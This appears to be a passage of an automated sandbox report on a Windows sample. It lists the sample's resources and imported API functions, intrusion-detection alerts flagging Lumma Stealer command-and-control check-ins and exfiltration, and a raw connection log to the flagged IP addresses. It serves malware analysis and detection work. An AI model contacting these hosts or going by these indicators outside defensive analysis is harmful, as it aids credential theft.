                                                                                                                                                                                                RT_DIALOG0x14c8280x18edataEnglishUnited States0.6080402010050251
                                                                                                                                                                                                RT_DIALOG0x14b8800x54adataEnglishUnited States0.37961595273264404
                                                                                                                                                                                                RT_DIALOG0x14bdd00x14adataEnglishUnited States0.6212121212121212
                                                                                                                                                                                                RT_DIALOG0x14b5300x34edataEnglishUnited States0.450354609929078
                                                                                                                                                                                                RT_DIALOG0x14bf200x1d2dataEnglishUnited States0.5
                                                                                                                                                                                                RT_DIALOG0x14b1d80x16adataEnglishUnited States0.6353591160220995
                                                                                                                                                                                                RT_DIALOG0x14c6600x11adataEnglishUnited States0.6418439716312057
                                                                                                                                                                                                RT_DIALOG0x14b3480x1e2dataEnglishUnited States0.6182572614107884
                                                                                                                                                                                                RT_DIALOG0x14c5480x112dataEnglishUnited States0.6240875912408759
                                                                                                                                                                                                RT_DIALOG0x14c3800x1c6dataEnglishUnited States0.5925110132158591
                                                                                                                                                                                                RT_DIALOG0x14c7800xa4dataEnglishUnited States0.7560975609756098
                                                                                                                                                                                                RT_DIALOG0x17ab880xe8dataEnglishUnited States0.6336206896551724
                                                                                                                                                                                                RT_STRING0x17afe00xdadataEnglishUnited States0.41284403669724773
                                                                                                                                                                                                RT_STRING0x17b0c00x34dataEnglishUnited States0.5769230769230769
                                                                                                                                                                                                RT_STRING0x17b0f80x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                                                                                                RT_STRING0x17b1800x2adataEnglishUnited States0.5476190476190477
                                                                                                                                                                                                RT_STRING0x17b1b00x14adataEnglishUnited States0.5060606060606061
                                                                                                                                                                                                RT_STRING0x17b3000x4e2dataEnglishUnited States0.376
                                                                                                                                                                                                RT_STRING0x17bb780x2a2dataEnglishUnited States0.28338278931750743
                                                                                                                                                                                                RT_STRING0x17b8980x2dcdataEnglishUnited States0.36885245901639346
                                                                                                                                                                                                RT_STRING0x17b7e80xacdataEnglishUnited States0.45348837209302323
                                                                                                                                                                                                RT_STRING0x17c5500xdedataEnglishUnited States0.536036036036036
                                                                                                                                                                                                RT_STRING0x17be200x4c4dataEnglishUnited States0.3221311475409836
                                                                                                                                                                                                RT_STRING0x17c2e80x264dataEnglishUnited States0.3741830065359477
                                                                                                                                                                                                RT_STRING0x17c6300x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                                                                                RT_ACCELERATOR0x1485f80x120dataEnglishUnited States0.5381944444444444
                                                                                                                                                                                                RT_GROUP_CURSOR0x14add00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                RT_GROUP_CURSOR0x14b0700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                RT_GROUP_CURSOR0x14b1c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                RT_GROUP_CURSOR0x14ac800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                RT_GROUP_CURSOR0x14af200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                RT_GROUP_CURSOR0x179d180x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                RT_GROUP_CURSOR0x179f300x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                RT_GROUP_CURSOR0x17a1480x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                RT_GROUP_CURSOR0x17a3600x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0
                                                                                                                                                                                                RT_GROUP_CURSOR0x17a5780x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                RT_GROUP_ICON0x1546e00x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                                RT_GROUP_ICON0x15c4000x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                                RT_GROUP_ICON0x1641200x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                                RT_GROUP_ICON0x173b600x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                                RT_GROUP_ICON0x16be400x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                                RT_VERSION0x1487180x35cdataEnglishUnited States0.45232558139534884
                                                                                                                                                                                                RT_ANICURSOR0x148c600x1ee6RIFF (little-endian) data, animated cursor "Small Hourglass" PPEscherEnglishUnited States0.08103666245259165
                                                                                                                                                                                                RT_MANIFEST0x148a780x1e7XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5503080082135524
                                                                                                                                                                                                None0x14c9b80x47dataEnglishUnited States0.9436619718309859
                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                KERNEL32.dllHeapSize, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetEnvironmentStrings, GetCommandLineW, GetCommandLineA, SetHandleCount, GetStdHandle, GetStartupInfoA, GetModuleFileNameA, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, CompareStringA, CompareStringW, VirtualAlloc, IsBadWritePtr, LCMapStringA, LCMapStringW, SetUnhandledExceptionFilter, GetFileType, IsBadReadPtr, IsBadCodePtr, GetCPInfo, IsValidLocale, IsValidCodePage, GetLocaleInfoA, EnumSystemLocalesA, GetUserDefaultLCID, GetStringTypeA, GetStringTypeW, GetACP, GetOEMCP, SetEnvironmentVariableA, GetDriveTypeA, GetLocaleInfoW, SetStdHandle, GetLocalTime, FindResourceA, GlobalAddAtomA, GetProfileStringA, InterlockedExchange, GetSystemTime, GetTimeZoneInformation, ExitThread, CreateThread, HeapReAlloc, GetDriveTypeW, RaiseException, HeapFree, HeapAlloc, RtlUnwind, GetStartupInfoW, SetErrorMode, SystemTimeToFileTime, LocalFileTimeToFileTime, GetFileSize, FindResourceExW, GetCurrentDirectoryW, GlobalFlags, FindNextFileW, lstrcmpiW, GetThreadLocale, GetStringTypeExW, GetVolumeInformationW, FindFirstFileW, FindClose, UnlockFile, LockFile, SetFilePointer, DuplicateHandle, FileTimeToLocalFileTime, FileTimeToSystemTime, GetProfileIntW, TlsGetValue, LocalReAlloc, TlsSetValue, GlobalReAlloc, TlsFree, GlobalHandle, TlsAlloc, LocalAlloc, GetProcessVersion, GetDiskFreeSpaceW, GetFileTime, SetFileTime, GetFullPathNameW, GetTempFileNameW, GetFileAttributesW, GlobalFree, lstrcmpW, lstrcmpA, lstrcmpiA, GetCurrentThread, GlobalGetAtomNameW, CreateEventW, SuspendThread, SetEvent, LoadLibraryA, GetVersion, lstrcatW, GlobalAddAtomW, GlobalFindAtomW, GlobalDeleteAtom, InterlockedDecrement, InterlockedIncrement, MulDiv, GetModuleHandleA, 
SetLastError, lstrlenA, ExitProcess, GlobalAlloc, GlobalLock, GlobalUnlock, SizeofResource, LoadResource, LockResource, SetCurrentDirectoryW, WritePrivateProfileStringW, GetPrivateProfileIntW, GetPrivateProfileStringW, FlushFileBuffers, WriteFile, ReadFile, SetFilePointerEx, SetEndOfFile, GetFileSizeEx, CreateFileW, MultiByteToWideChar, GetWindowsDirectoryW, GetModuleFileNameW, LoadLibraryW, WideCharToMultiByte, FreeLibrary, GetCurrentProcess, GetTempPathW, CreateDirectoryW, GetFileAttributesExW, GetLongPathNameW, GetShortPathNameW, GetLastError, LocalFree, MoveFileW, DeleteFileW, SetThreadPriority, Sleep, AttachConsole, GenerateConsoleCtrlEvent, FreeConsole, TerminateProcess, CreateProcessW, GetExitCodeProcess, CloseHandle, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, DeleteCriticalSection, GetCurrentThreadId, GetModuleHandleW, GetProcAddress, GetVersionExW, lstrcpynW, lstrcpyW, WaitForSingleObject, ResumeThread, FindResourceW, GetTickCount, lstrlenW, GetCurrentDirectoryA
USER32.dll: MoveWindow, SetWindowTextW, IsDialogMessageW, IsDlgButtonChecked, SetDlgItemTextW, SendDlgItemMessageW, SendDlgItemMessageA, MapWindowPoints, PeekMessageW, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetTopWindow, MessageBoxW, WinHelpW, GetClassInfoW, RegisterClassW, TrackPopupMenu, SetWindowPlacement, GetDlgItem, GetWindowTextLengthW, GetWindowTextW, DestroyWindow, CreateWindowExW, DefWindowProcW, GetMessageTime, GetLastActivePopup, GetForegroundWindow, SystemParametersInfoW, GetWindowPlacement, wsprintfW, EndPaint, BeginPaint, GetWindowDC, SetWindowPos, LockWindowUpdate, CheckMenuItem, IsChild, GetMenu, SetMenu, IsIconic, ExitWindowsEx, DestroyIcon, GetMessageW, TranslateMessage, DispatchMessageW, InsertMenuW, FindWindowW, GetMenuStringW, CallNextHookEx, keybd_event, SetWindowsHookExW, TrackPopupMenuEx, UnhookWindowsHookEx, GetMenuItemCount, WindowFromPoint, DestroyMenu, ShowWindow, GetCapture, IntersectRect, IsRectEmpty, SetRectEmpty, ReleaseDC, DrawFocusRect, GetSysColor, SetCursor, IsWindowEnabled, SetFocus, RegisterWindowMessageW, GetWindow, CreatePopupMenu, GetMessagePos, RedrawWindow, BeginDeferWindowPos, LoadCursorW, DestroyCursor, UnregisterClassW, GetWindowTextLengthA, GetDlgCtrlID, HideCaret, ShowCaret, ExcludeUpdateRgn, OffsetRect, EndDeferWindowPos, GetSystemMenu, RemovePropW, GetPropW, CallWindowProcW, SetWindowLongW, SetPropW, GetMenuItemID, GetMenuDefaultItem, LoadIconW, KillTimer, SetTimer, SetParent, AppendMenuW, InflateRect, ClientToScreen, GetCursorPos, GetKeyState, GetNextDlgTabItem, GetClassNameW, CharUpperW, GetDCEx, GetSysColorBrush, wvsprintfW, LoadStringW, EndDialog, CreateDialogIndirectParamW, DeleteMenu, GetParent, GrayStringW, DrawTextW, TabbedTextOutW, ScreenToClient, GetFocus, InvalidateRect, PtInRect, SetCapture, ReleaseCapture, UpdateWindow, CheckMenuRadioItem, IsWindowVisible, SetActiveWindow, SetForegroundWindow, PostMessageW, LoadMenuW, GetDC, GetWindowRect, LoadBitmapW, GetSubMenu, SetMenuDefaultItem, SendMessageW, EnableWindow, GetClientRect, GetWindowTextA, DrawTextA, GetClassInfoA, DefDlgProcA, DefWindowProcA, MapDialogRect, GetAsyncKeyState, ShowOwnedPopups, PostQuitMessage, BringWindowToTop, UnpackDDElParam, ReuseDDElParam, GetDesktopWindow, TranslateAcceleratorW, LoadAcceleratorsW, GetActiveWindow, ValidateRect, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuW, SetMenuItemBitmaps, SetRect, EnableMenuItem, CharNextA, CallWindowProcA, RemovePropA, SetWindowsHookExA, GetWindowLongA, SendMessageA, IsWindowUnicode, GetClassNameA, SetWindowLongA, SetPropA, GetPropA, IsWindow, GetWindowLongW, CopyRect, GetSystemMetrics
GDI32.dll: OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, IntersectClipRect, SetViewportOrgEx, GetDeviceCaps, CreatePen, CreateSolidBrush, CreatePatternBrush, SetRectRgn, GetTextMetricsW, EnumFontFamiliesExW, SetMapMode, CreateRectRgn, CombineRgn, SetTextColor, SetBkMode, SetBkColor, SaveDC, GetClipBox, CreateRectRgnIndirect, ExtSelectClipRgn, SetStretchBltMode, StretchDIBits, SetDIBitsToDevice, RestoreDC, CreateDIBSection, DeleteDC, PatBlt, DeleteObject, SelectObject, GetBkMode, GetBkColor, GetTextExtentPoint32W, GetTextColor, Escape, ExtTextOutW, TextOutW, RectVisible, PtVisible, BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, CreateBitmap, GetStockObject, GetObjectW, CreateDIBitmap, ExtTextOutA, GetTextExtentPointA, CreateFontIndirectW
comdlg32.dll: GetSaveFileNameW, GetOpenFileNameW, GetFileTitleW
WINSPOOL.DRV: ClosePrinter, DocumentPropertiesW, OpenPrinterW
ADVAPI32.dll: RegCloseKey, RegOpenKeyExW, RegQueryValueW, RegSetValueExW, RegCreateKeyW, RegSetValueW, RegDeleteKeyW, RegEnumKeyW, RegOpenKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegQueryValueExW, RegCreateKeyExW, RegDeleteValueW, SetFileSecurityW, GetFileSecurityW, RegEnumKeyExW
SHELL32.dll: SHGetDesktopFolder, SHGetMalloc, SHGetFileInfoW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, DragQueryFileW, SHFileOperationW, SHGetSpecialFolderPathW, DragAcceptFiles, ShellExecuteW, DragFinish, ExtractIconW
COMCTL32.dll: ImageList_BeginDrag, ImageList_GetImageInfo, ImageList_DragEnter, _TrackMouseEvent, ImageList_Draw, ImageList_AddMasked, ImageList_DragLeave, ImageList_DragMove, ImageList_EndDrag, ImageList_Destroy, ImageList_Create, PropertySheetW, DestroyPropertySheetPage, CreatePropertySheetPageW, ImageList_DrawIndirect, ImageList_ReplaceIcon
ole32.dll: CoUninitialize, CoCreateGuid, CoInitialize, CoCreateInstance
OLEAUT32.dll: SysAllocString, SysFreeString
SHLWAPI.dll: PathFileExistsW, PathFindExtensionW, PathMakePrettyW, PathFindFileNameW, PathRemoveFileSpecW, PathRenameExtensionW, PathIsRootW, PathIsDirectoryW, PathIsURLW
WINHTTP.dll: WinHttpQueryHeaders, WinHttpCrackUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpOpen, WinHttpConnect, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpSendRequest, WinHttpQueryOption, WinHttpSetOption, WinHttpReceiveResponse
Language of compilation system | Country where language is spoken | Map
English | United States | (map image not extracted)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-05T18:02:18.829266+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:19.580500+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:19.580500+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:20.163505+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:20.919112+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49750 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:20.919112+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49750 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:21.525493+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49751 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:22.710941+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49752 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:24.878108+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49753 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:26.330947+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49754 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:27.341178+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49755 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:27.818132+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49755 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:28.299990+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49756 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:28.770787+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49756 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:29.529144+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49757 | 185.161.251.21 | 443 | TCP
2025-01-05T18:02:30.287392+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49758 | 104.21.37.128 | 443 | TCP
2025-01-05T18:02:30.643871+0100 | 2008438 | ET MALWARE Possible Windows executable sent when remote host claims to send a Text File | 1 | 104.21.37.128 | 443 | 192.168.2.4 | 49758 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2025 18:02:18.361114979 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:18.361159086 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:18.361222029 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:18.364470005 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:18.364483118 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:18.829189062 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:18.829266071 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:18.834341049 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:18.834357023 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:18.834614038 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:18.886486053 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:18.886509895 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:18.886590958 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:19.580522060 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:19.580610991 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:19.580660105 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:19.630917072 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:19.630942106 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:19.630954981 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:19.630960941 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:19.691549063 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:19.691581011 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:19.691672087 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:19.692256927 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:19.692269087 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.162185907 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.163505077 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:20.163505077 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:20.163528919 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.163734913 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.165039062 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:20.165039062 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:20.165096998 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.919112921 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.919166088 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.919193983 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.919224977 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.919253111 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.919279099 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.919281960 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:20.919300079 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.919326067 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:20.919353008 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.919380903 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.919408083 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:20.919414997 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.919805050 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:20.919908047 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.923847914 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.923969030 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.923983097 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:20.924027920 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:20.924150944 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:20.924161911 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:20.924192905 CET | 49750 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:20.924196959 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:21.059772968 CET | 49751 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:21.059811115 CET | 443 | 49751 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:21.059902906 CET | 49751 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:21.060189009 CET | 49751 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:21.060204029 CET | 443 | 49751 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:21.525423050 CET | 443 | 49751 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:21.525492907 CET | 49751 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:21.527081013 CET | 49751 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:21.527091980 CET | 443 | 49751 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:21.527333975 CET | 443 | 49751 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:21.528424978 CET | 49751 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:21.528548002 CET | 49751 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:21.528582096 CET | 443 | 49751 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:21.528645039 CET | 49751 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:21.528651953 CET | 443 | 49751 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:22.181298971 CET | 443 | 49751 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:22.181392908 CET | 443 | 49751 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:22.181442976 CET | 49751 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:22.181607962 CET | 49751 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:22.181624889 CET | 443 | 49751 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:22.252069950 CET | 49752 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:22.252116919 CET | 443 | 49752 | 188.114.96.3 | 192.168.2.4
Jan 5, 2025 18:02:22.252187014 CET | 49752 | 443 | 192.168.2.4 | 188.114.96.3
Jan 5, 2025 18:02:22.252456903 CET | 49752 | 443 | 192.168.2.4 | 188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.252473116 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.710844040 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.710941076 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.712126970 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.712138891 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.712366104 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.713740110 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.713838100 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.713871956 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.221426964 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.221524000 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.221595049 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.221755028 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.221780062 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.392889023 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.392920017 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.392980099 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.393228054 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.393238068 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.877993107 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.878108025 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.885267019 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.885293007 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.885536909 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.886681080 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.887029886 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.887049913 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.887129068 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.887136936 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:25.509438992 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:25.509522915 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:25.509583950 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:25.509881973 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:25.509896040 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:25.818006992 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:25.818046093 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:25.818121910 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:25.818413973 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:25.818429947 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.330876112 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.330946922 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:26.332168102 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:26.332176924 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.332408905 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.333573103 CET49754443192.168.2.4188.114.96.3
